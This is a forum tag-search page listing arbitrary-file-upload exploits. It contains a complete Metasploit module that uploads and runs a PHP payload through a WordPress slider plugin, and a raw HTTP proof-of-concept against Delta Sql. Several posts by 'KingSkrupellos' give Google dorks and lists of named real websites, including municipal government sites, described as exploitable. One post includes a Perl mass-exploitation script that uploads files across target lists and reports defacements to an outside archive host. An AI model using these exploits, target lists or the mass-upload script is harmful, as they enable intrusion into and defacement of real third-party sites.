Search the forums

Showing results for the tag 'arbitrary'.



49 results found

  1.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HTTP::Wordpress
  include Msf::Exploit::PhpEXE

  def initialize(info={})
    super(update_info(info,
      'Name'           => "WordPress Responsive Thumbnail Slider Arbitrary File Upload",
      'Description'    => %q{
        This module exploits an arbitrary file upload vulnerability in Responsive
        Thumbnail Slider Plugin v1.0 for WordPress post authentication.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Arash Khazaei', # EDB PoC
          'Shelby Pace'    # Metasploit Module
        ],
      'References'     =>
        [
          [ 'EDB', '37998' ]
        ],
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Responsive Thumbnail Slider Plugin v1.0', { } ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Aug 28 2015",
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [ true, "Base path for WordPress", '/' ]),
        OptString.new('WPUSERNAME', [ true, "WordPress Username to authenticate with", 'admin' ]),
        OptString.new('WPPASSWORD', [ true, "WordPress Password to authenticate with", '' ])
      ])
  end

  def check
    # The version regex found in extract_and_check_version does not work for this plugin's
    # readme.txt, so we build a custom one.
    check_code = check_version || check_plugin_path
    if check_code
      return check_code
    else
      return CheckCode::Safe
    end
  end

  def check_version
    plugin_uri = normalize_uri(target_uri.path, '/wp-content/plugins/wp-responsive-thumbnail-slider/readme.txt')
    res = send_request_cgi(
      'method' => 'GET',
      'uri'    => plugin_uri
    )
    if res && res.body && res.body =~ /Version:([\d\.]+)/
      version = Gem::Version.new($1)
      if version <= Gem::Version.new('1.0')
        vprint_status("Plugin version found: #{version}")
        return CheckCode::Appears
      end
    end
    nil
  end

  def check_plugin_path
    plugin_uri = normalize_uri(target_uri.path, '/wp-content/uploads/wp-responsive-images-thumbnail-slider/')
    res = send_request_cgi(
      'method' => 'GET',
      'uri'    => plugin_uri
    )
    if res && res.code == 200
      vprint_status('Upload folder for wp-responsive-images-thumbnail-slider detected')
      return CheckCode::Detected
    end
    nil
  end

  def login
    auth_cookies = wordpress_login(datastore['WPUSERNAME'], datastore['WPPASSWORD'])
    return fail_with(Failure::NoAccess, "Unable to log into WordPress") unless auth_cookies
    store_valid_credential(user: datastore['WPUSERNAME'], private: datastore['WPPASSWORD'], proof: auth_cookies)
    print_good("Logged into WordPress with #{datastore['WPUSERNAME']}:#{datastore['WPPASSWORD']}")
    auth_cookies
  end

  def upload_payload(cookies)
    manage_uri = 'wp-admin/admin.php?page=responsive_thumbnail_slider_image_management'
    file_payload = get_write_exec_payload(:unlink_self => true)
    file_name = "#{rand_text_alpha(5)}.php"

    # attempt to access plugins page
    plugin_res = send_request_cgi(
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path, manage_uri),
      'cookie' => cookies
    )
    unless plugin_res && plugin_res.body.include?("tmpl-uploader-window")
      fail_with(Failure::NoAccess, "Unable to reach Responsive Thumbnail Slider Plugin Page")
    end

    data = Rex::MIME::Message.new
    data.add_part(file_payload, 'image/jpeg', nil, "form-data; name=\"image_name\"; filename=\"#{file_name}\"")
    data.add_part(file_name.split('.')[0], nil, nil, "form-data; name=\"imagetitle\"")
    data.add_part('Save Changes', nil, nil, "form-data; name=\"btnsave\"")
    post_data = data.to_s

    # upload the file
    upload_res = send_request_cgi(
      'method' => 'POST',
      'uri'    => normalize_uri(target_uri.path, manage_uri, '&action=addedit'),
      'cookie' => cookies,
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    )

    page = send_request_cgi(
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path, manage_uri),
      'cookie' => cookies
    )
    fail_with(Failure::Unknown, "Unsure of successful upload") unless (upload_res && page && page.body =~ /New\s+image\s+added\s+successfully/)

    retrieve_file(page, cookies)
  end

  def retrieve_file(res, cookies)
    fname = res.body.scan(/slider\/(.*\.php)/).flatten[0]
    # nil must be tested before empty?, otherwise a missing match raises NoMethodError
    fail_with(Failure::BadConfig, "Couldn't find file name") if fname.nil? || fname.empty?
    file_uri = normalize_uri(target_uri.path, "wp-content/uploads/wp-responsive-images-thumbnail-slider/#{fname}")
    print_good("Successful upload")
    send_request_cgi(
      'uri'    => file_uri,
      'method' => 'GET',
      'cookie' => cookies
    )
  end

  def exploit
    unless check == CheckCode::Safe
      auth_cookies = login
      upload_payload(auth_cookies)
    end
  end
end
  2.
# Exploit Title: Delta Sql 1.8.2 - Arbitrary File Upload
# Dork: N/A
# Date: 2018-10-25
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://deltasql.sourceforge.net/
# Software Link: https://sourceforge.net/projects/deltasql/files/latest/download
# Software Link: http://deltasql.sourceforge.net/deltasql/
# Version: 1.8.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC:
# 1)
# http://localhost/[PATH]/docs_manage.php?id=1
#
# http://localhost/[PATH]/upload/[FILE]

POST /[PATH]/docs_upload.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/[PATH]/docs_manage.php?id=1
Cookie: PHPSESSID=ra5c0bgati64a01fag01l8hhf0
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------158943328914318561992147220435
Content-Length: 721

-----------------------------158943328914318561992147220435
Content-Disposition: form-data; name="fileToUpload"; filename="Efe.php"
Content-Type: application/force-download

<?php phpinfo(); ?>
-----------------------------158943328914318561992147220435
Content-Disposition: form-data; name="submit"

Upload File
-----------------------------158943328914318561992147220435
Content-Disposition: form-data; name="id"

1
-----------------------------158943328914318561992147220435
Content-Disposition: form-data; name="version"


-----------------------------158943328914318561992147220435
Content-Disposition: form-data; name="hasdocs"


-----------------------------158943328914318561992147220435--

HTTP/1.1 200 OK
Date: Thu, 24 Oct 2018 00:24:27 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 1783
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<html>
<body>
<form action="http://localhost/[PATH]/docs_upload.php" method="post" enctype="multipart/form-data">
Select document to upload:
<input name="fileToUpload" id="fileToUpload" type="file">
<input value="Ver Ayari" name="submit" type="submit">
<input value="1" name="id" type="hidden">
<input value="1'" name="version" type="hidden">
<input value="1" name="hasdocs" type="hidden">
</form>
</body>
</html>
  3.
# Indonesia Official CarDealer MediaTech TinyMcPuk Filemanager Arbitrary File Upload Vulnerability
# Author : KingSkrupellos from Cyberizm.Org Digital Security Technological Turkish Moslem Army
# Vendor Homepage => mediatechindonesia.com
# Google Dork => All rights reserved. © 2015 Media Tech Indonesia
# CWE-264 - [ Permissions, Privileges, and Access Controls ]
# CXSecurity : cxsecurity.com/ascii/WLB-2018050180
# Cyberizm : cyberizm.org/cyberizm-indo-cardealer-mediatech-tinymcpuk-filemanager-exploit.html
#################################################################################
Exploit => ...../tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash
You can check if the vulnerability still exists via => ...../tinymcpuk/plugins/flash/flash.htm
Please upload your file as => /yourfilename.htm.fla
Your File Here [ Path ] => /tinymcpuk/gambar/Flash/......htm.fla
#################################################################################
Example Sites and Target IP => 103.27.206.203
daihatsusidoarjo.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash
suzukipedia.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash
toyotaterpercaya.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash
promosidoarjodaihatsu.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash
promomobiltoyotasurabaya.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash
promomobiltoyotasidoarjo.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash
promomobiltoyotajatim.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash
salestoyotagresik.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash
saleshondasurabaya.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash
swalayanrak.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash
suzukiwarusurabaya.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash
suzukiumcsurabaya.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash
suzukisbtsurabaya.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash
suzukisbtmalang.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash
suzukipedia.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash
suzukimurahsurabaya.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash
suzukimobilsurabaya.net/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash
suzukimobilsurabaya.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash
surabayadaihatsu.info/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash
surabayadaihatsu.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash
umcsuzukipasuruan.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash
umcsuzukijatim.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash
suzukipedia.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash
Example Mirror [ Proof of Concept ] => zone-h.org/mirror/id/31184406
#################################################################################
Discovered By : KingSkrupellos from Cyberizm.Org
#################################################################################
  4.
# Exploit Title : Joomla Content Editor JCE Image Manager Auto Mass Exploiter and Arbitrary File Upload Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm.Org Digital Security Technological Turkish Moslem Army
# Vendor Homepage : joomlacontenteditor.net
# Software Download Link : joomlacontenteditor.net/downloads / extensions.joomla.org/extension/jce/
# Exploit Risk : High
# CWE-264 - [ Permissions, Privileges, and Access Controls ]
# CXSecurity [ Author : KingSkrupellos ] : cxsecurity.com/ascii/WLB-2018050200
# Cyberizm : cyberizm.org/cyberizm-joomla-content-editor-jce-auto-mass-exploiter.html
#################################################################################
Exploit Title : Joomla Content Editor JCE ImageManager Vulnerability Mass Auto Exploiter
Google Dork [ Example ] => inurl:''/index.php?option=com_jce''
You can search all plugins and themes to find more sites. Most of them have this plugin JCE installed. [ % 40 or more ] Use your brain.
Explanation for Joomla Content Editor JCE => [ ScreenShot ] https://cdn.pbrd.co/images/Hmx6KZC.jpg
JCE makes creating and editing Joomla!® content easy... Add a set of tools to your Joomla!® environment that gives you the power to create the kind of content you want, without limitations, and without needing to know or learn HTML, XHTML, CSS...
Office-like functions and familiar buttons make formatting simple
Upload, rename, delete, cut/copy/paste images and insert them into your articles using an intuitive and familiar interface
Create Links to Categories, Articles, Weblinks and Contacts¹ in your site using a unique and practical Link Browser
Easily tab between WYSIWYG, Code and Preview modes.
Create Tables, edit Styles, format text and more...
Integrated Spellchecking using your browser's Spellchecker
Fine-grained control over the editor layout and features with Editor Profiles
Media Manager => Upload and insert a range of common media files including Adobe® Flash®, Apple Quicktime®, Windows Media Player® and HTML 5 Video and Audio.
Easily insert Youtube and Vimeo videos - just paste in the URL and Insert!
Insert HTML5 Video and Audio with multiple source options
Image Manager Extended => Create a thumbnail of any part of an image with the Thumbnail Editor
Insert multiple images.
Create responsive images with the srcset attribute
Create image popups in a few clicks - requires JCE MediaBox or compatible Popup Extension
Filemanager => Create links to images, documents, media and other common file types
Include a file type icon, file size and modified date
Insert as a link or embed the document with an iframe
Create downloadable files using the download attribute.
Template Manager => Insert pre-defined template content from html or text files
Create template snippet files from whole articles or selected content
Configure the Template Manager to set the startup content of new articles
#################################################################################
Severity: High
[ ScreenShot for JCE Editor ] => https://cdn.pbrd.co/images/HmypA0v.png
This attack could pose a serious security threat. You should take immediate action to stop any damage or prevent further damage from happening.
The component is prone to the following security vulnerabilities:
1. A cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input to the 'search' parameter of the 'administrator/index.php' script.
2. A security-bypass vulnerability occurs due to an error in the 'components/com_jce/editor/extensions/browser/file.php' script.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Affected JCE 2.1.0 is vulnerable; other versions may also be affected.
References => https://www.symantec.com/security_response/attacksignatures/detail.jsp?asid=27481
References => https://www.securityfocus.com/bid/53630
Note : This Joomla JCE is not the previous exploit going to this path => ..../images/stories/......php => NOT
This JCE is well-known by some hackers but some hackers do not know anything about this vulnerability. So this is the new one.
TARGETSİTE/yourfilename.png .gif .jpg or TARGETSİTE/images/yourfilename.html .php .asp .jpg .gif .png
#################################################################################
Notes => Joomla Content Editor JCE Toggle Editor / Image Manager behind the Administration Panel [ ScreenShot ] => https://cdn.pbrd.co/images/Hmx6KZC.jpg
An Attacker cannot reach this image manager without username and password on the control panel. But there is a little trick to upload an image or a file behind this vulnerability. One Attacker must execute with remote file upload code.
Watch Videos from Original Sources =>
Install JCE Editor in Joomla! 2.5 Tutorial [video=youtube]https://www.youtube.com/watch?v=oQdyi_xKJBk[/video]
Joomla 3 Tutorial #7: Using the Joomla Content Editor (JCE) Tutorial [video=youtube]https://www.youtube.com/watch?v=fI0_S-T1gK8[/video]
How to Update Upgrade a Joomla! Page that uses JCE: the Joomla Content Editor. Fix the Bugs for this Vulnerability [video=youtube]https://www.youtube.com/watch?v=X6h5kcAxvu0[/video]
#################################################################################
You can check with these exploit codes on your browser if the sites are vulnerable for testing the security. So you will see some errors.
Exploit => ....../index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20 {"result":{"error":true,"result":""},"error":null} Exploit => ...../index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload or giving this error => {"result":null,"error":"No function call specified!"} Exploit => /component/option,com_jce/action,upload/file,imgmanager/lang,en/method,form/plugin,imgmanager/task,plugin/ {"result":null,"error":"No function call specified!"} Path => TARGETSİTE/yourfilename.png gif jpg or TARGETSİTE/images/yourfilename.png gif jpg html txt ################################################################################# Auto Mass Exploiter Perl => [code]#!/usr/bin/perl use Term::ANSIColor; use LWP::UserAgent; use HTTP::Request; use HTTP::Request::Common qw(POST); $ua = LWP::UserAgent->new(keep_alive => 1); $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)"); $ua->timeout (10); system('title JCE Mass Auto Exploiter by KingSkrupellos'); print "JCE Mass Auto Exploiter\n"; print "Coded by KingSkrupellos\n"; print "Cyberizm Digital Security Team\n"; print "Sitelerin Listesi Reyis:"; my $list=<STDIN>; chomp($list); open (THETARGET, "<$list") || die ">>>Web sitesi listesi açılamıyor<<< !"; @TARGETS = <THETARGET>; close THETARGET; $link=$#TARGETS + 1; foreach $site(@TARGETS){ chomp $site; if($site !~ /http:\/\//) { $site = "http://$site/"; }; $exploiturl="/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20"; print "wait upload $site\n"; $vulnurl=$site.$exploiturl; $res = $ua->get($vulnurl)->content; if ($res =~ m/No function call specified!/i){ open(save, '>>C:\Users\Kullanıcılar\KingSkrupellos\result\list.txt'); print "\n[Uploading]"; my $res = $ua->post($vulnurl, Content_Type => 'form-data', Content => [ 'upload-dir' => './../../', 'upload-overwrite' => 0, 'Filedata' => ["kingskrupellos.png"], 'action' => 
'upload' ] )->decoded_content; if ($res =~ m/"error":false/i){ }else{ print " ......... "; print color('bold white'); print "["; print color('reset'); print color('bold green'); print "PATCHED"; print color('reset'); print color('bold white'); print "] \n"; print color('reset'); } $remote = IO::Socket::INET->new( Proto=> PeerAddr=>"$site", PeerPort=> Timeout=> ); $def= "$site/kingskrupellos.png"; print colored ("[+]Basarili",'white on_red'),"\n"; print "$site/kingskrupellos.png\n"; }else{ print colored (">>Exploit Olmadi<<",'white on_blue'),"\n"; } } sub zonpost{ $req = HTTP::Request->new(GET=>$link); $useragent = LWP::UserAgent->new(); $response = $useragent->request($req); $ar = $response->content; if ($ar =~ /Hacked By KingSkrupellos/){ $dmn= $link; $def="KingSkrupellos"; $zn="http://aljyyosh.org/single.php"; $lwp=LWP::UserAgent->new; $res=$lwp -> post($zn,[ 'defacer' => $def, 'domain1' => $dmn, 'hackmode' => '15', 'reason' => '1', 'Gönder' => 'Send', ]); if ($res->content =~ /color="red">(.*)<\/font><\/li>/) { print colored ("[-]Gönder $1",'white on_green'),"\n"; } else { print colored ("[-]Hata",'black on_white'),"\n"; } }else{ print" Zone Alınmadı !! \n"; } }[/code] How to use this code on your operating system like Windows ; Open Start + Go to Search Button + Type + Command Prompt [ Komut İstemi ] => or cmd.exe Or you can use ConEmulator for Windows => https://conemu.github.io => Download it and use it. 
Create a folder like " jcee " and put your jceexploit.pl and yourimagefile.png ,gif ,png ,html ,txt
C:/Users/Your-Computer-Name/
cd Desktop
cd "jcee"
perl yourexploitcodenamejce.pl site.txt
Waiting for Upload Exploit Successful or Not Finished
# Uploaded File/Image Directory Path => TARGETDOMAIN/yourfilename.png .jpg .gif
TARGETDOMAIN/images/yourfilename.png .jpg .gif
#################################################################################
Example Vulnerable Sites =>
aXbcdance.ro/component/option,com_jce/action,upload/file,imgmanager/lang,en/method,form/plugin,imgmanager/task,plugin/ {"result":{"error":true,"result":""},"error":null} => [ Proof of Concept ] => archive.is/J2eX0 => archive.is/YFanj
sXv-pfaffenhofen.de/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload {"result":{"error":true,"result":""},"error":null}
bXuses.co.il/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload {"result":{"error":true,"result":""},"error":null}
irm.edu.vn/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
pigpilot.net/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
deep-centr.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
wintotal.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
restaurante-chines.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
artlife54.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
litekstent.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
artstairs.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
telltale.co.za/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
zivapodstran.cz/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
littlefolkvisuals.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
practicsa.ro/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
tis.co.th/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
newconcept-cleaning.co.uk/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
basolatogucciardi.it/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
finansure.co.uk/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
kansystem.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
comtec.rs/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
esmikom.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
farmacovigilanza-online.org/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
djgonis.gr/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
diktatura.lt/main/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
despachosdigitales.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
gebaeudereinigung-pesch.de/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
jeddah4arch.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
swmoveisplanejados.com.br/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
psychologie.it/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
rolsteigerkopen.nl/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
studiocontabilecapuana.it/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
traversatacarnica.it/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
arcade-sages-femmes.ch/asf/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
alamoconsulting.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
asociacionchajulense.org/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
caseyfiliaci.com/joomla/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
dermedica.biz/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
custer.eu/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
gimsusz.pl/joomla/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
guayab.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
physiotherapie-wenus.de/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
quintasaojoao.net/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
ocetehnotrade.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
psxm-tkdm.gr/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
confatech.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
jeffcole.net/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
cabanascamilo.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
thesurelink.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
oddjobthesailor.co.uk/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
linalux-montlesoie.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
mgsopop.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
pascal-it.it/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
sicurservice.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
balzamcda.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
diaocsontra.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
juergenlagger.net/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
johnmcfaddenattorney.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
spacious.com.tw/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
kims-ltd.co.uk/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
percyparkminis.co.uk/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
THE END
#################################################################################
Discovered By KingSkrupellos from Cyberizm Digital Security Team
#################################################################################
  5.
# Exploit Title : Powered by Quick.Cart & HOST[24] - profi hosting za 24,- Univex.Cz Fckeditor Arbitrary File Upload Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Vendor Homepage : opensolution.org ~ univex.cz ~ host24.cz
# Google Dorks : intext:''Copyright © 2008 www.univex.cz'' intext:''Powered by Quick.Cart & HOST[24] - profi hosting za 24,-'' site:cz
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE-264 [ Permissions, Privileges, and Access Controls ]
# CXSecurity : cxsecurity.com/ascii/WLB-2018060297
#################################################################################################
# Exploit : TARGET/fckeditor/editor/filemanager/connectors/uploadtest.html
# Path : TARGET/files/....
#################################################################################################
# Example Vulnerable Sites :
designbaterie.cz/fckeditor/editor/filemanager/connectors/uploadtest.html
letbalonem-darek.cz/fckeditor/editor/filemanager/connectors/uploadtest.html
strihanipsupardubice-salonamber.cz/fckeditor/editor/filemanager/connectors/uploadtest.html
krakonosuv-antikvariat.cz/fckeditor/editor/filemanager/connectors/uploadtest.html
iventilatory.cz/fckeditor/editor/filemanager/connectors/uploadtest.html
strihanipsupardubice-salonamber.cz/fckeditor/editor/filemanager/connectors/uploadtest.html
jn-models.cz/fckeditor/editor/filemanager/connectors/uploadtest.html
ardewo.cz/eshop/fckeditor/editor/filemanager/connectors/uploadtest.html
chalupaholubov.cz/fckeditor/editor/filemanager/connectors/uploadtest.html
seftrade.cz/fckeditor/editor/filemanager/connectors/uploadtest.html
################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################
  6.
# Exploit Title : Drupal PaisDigital ArgentinaGov Municipality ContactForm Arbitrary File Upload Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Date : 01/06/2018
# Vendor Homepage : argentina.gob.ar/paisdigital
# Tested On : Windows
# Exploit Risk : High
# CWE-264 - [ Permissions, Privileges, and Access Controls ]
# CXSecurity : cxsecurity.com/ascii/WLB-2018060021
#################################################################################################
# Google Dork 1 : inurl:''/?q=contacto'' site:gob.ar
# Google Dork 2 : intext:''Los archivos deben ser menores que 2 MB.'' site:gob.ar
# Google Dork 3 : intext:''Tipos de archivo permitidos: gif jpg jpeg png txt rtf html pdf doc docx odt ppt pptx odp xls xlsx.'' site:gob.ar
# Exploit : /?q=contacto
# Path : /sites/default/files/webform/....
# Notes => Allowed File Extensions : gif jpg jpeg png txt rtf html pdf doc docx odt ppt pptx odp xls xlsx.
#################################################################################################
# Target IP Address => 186.33.254.182
# Example Vulnerable Sites =>
municipalidaddeaguascalientes.gob.ar/?q=contacto [ Proof of Concept ] => archive.is/d8GHu => archive.is/QTpnS
pellegrini.gov.ar
magdalena.gob.ar
marull.gob.ar
pampablanca.gob.ar
municipalidaddeabrapampa.gob.ar
saladillo.gob.ar
lasflores.gob.ar
municipalidaddearrayanal.gob.ar
palmasola.gob.ar
frailepintado.gob.ar
rinconada.gob.ar
montedelosgauchos.gob.ar
trescruces.gob.ar
generallavalle.gob.ar
vinalito.gob.ar
puestoviejo.gob.ar
balcarce.gob.ar
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################
7. # Exploit Title : Drupal 7 jQuery ItalianGov Fi.it Scrivi Al Comune Arbitrary File Upload Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 22/06/2018
# Vendor Homepage : regione.toscana.it - jquery.com
# Tested On : Windows
# Version : 7
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-287 [ Improper Authentication ] + CWE-284 [ Improper Access Control ]
# CXSecurity : cxsecurity.com/ascii/WLB-2018060240
#################################################################################################
# Google Dorks : intext:''Scrivi al Comune'' site:fi.it
Il testo del tuo messaggio * site:fi.it
# Exploits : /scrivi-al-comune /scrivi-al-comune-0 /segnalazioni-e-reclami-0 /scrivi-al-sindaco-0 /node/19
# Path : /sites/www.comune.DOMAINADDRESS.fi.it/files/webform/.....
# Note => Allowed File Extensions : gif jpg png tif txt rtf odf pdf doc docx xls xlsx.
# Don't forget to put www. before comune. on the URL Address bar.
#################################################################################################
# Example Vulnerable Sites and Target IP =>
[ Proof of Concept for Vulnerability and Exploit ] => archive.is/zUN5z - archive.is/3IMxH
################################################################################################
Reference Topic Link [ It belongs to me ] => cyberizm.org/cyberizm-drupal-7-jquery-italia-fi-it-scrivi-al-comune-exploit.html
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################
8. #################################################################################################
# Exploit Title : WordPress DrcSystems EthicSolutions Jssor-Slider Library Plugin Arbitrary File Upload Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 19/06/2018
